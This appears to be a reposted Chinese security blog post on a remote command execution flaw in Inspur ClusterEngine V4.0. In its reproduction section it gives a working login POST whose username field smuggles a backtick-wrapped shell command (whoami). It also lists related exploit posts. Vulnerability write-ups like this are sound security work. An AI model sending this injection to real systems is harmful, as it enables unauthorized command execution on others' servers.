浪潮ClusterEngineV4.0 远程命令执行漏洞

admin

102157
文章

87
评论

2023年5月29日08:40:51评论71 views字数 903阅读3分0秒阅读模式

胜利和败北都要品尝，经历过四处流浪的辛酸，痛苦和悲伤的回忆，这样才能独当一面，就算痛哭流涕也没关系！

漏洞描述

浪潮服务器群集管理系统存在危险字符未过滤，导致远程命令执行

漏洞影响

浪潮ClusterEngineV4.0

漏洞复现

登录抓取数据包构造payload：

POST /login HTTP/1.1
op=login&username=1 2','1'); `whoami`

执行whoami命令

浪潮ClusterEngineV4.0 远程命令执行漏洞

漏洞利用POC

浪潮ClusterEngineV4.0 远程命令执行漏洞

文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。

免责声明：由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

CSDN:https://blog.csdn.net/weixin_48899364?type=blog
公众号：https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect
博客:https://rdyx0.github.io/
先知社区：https://xz.aliyun.com/u/37846
SecIN:https://www.sec-in.com/author/3097
FreeBuf：https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85

原文始发于微信公众号（儒道易行）：浪潮ClusterEngineV4.0 远程命令执行漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

浪潮ClusterEngineV4.0 远程命令执行漏洞

CVE-2024-32409 POC

【Weblogic 文件上传漏洞（CVE-2019-2618）

Weblogic 任意文件读取漏洞（CVE-2019-2615)

用友U8 slbmbygr.jsp 存在sql注入

Couchdb垂直权限绕过(CVE-2017-12635)

Couchdb任意命令执行漏洞 (CVE-2017-12636)

CVE-2022-22947-spring-gateway RCE

Weblogic 反序列化漏洞（CVE-2019-2729）

JumpServer 任意文件读取漏洞（CVE-2023-42819）

用友GPR-U8 slbmbygr SQL注入漏洞

发表评论

在线咨询

微信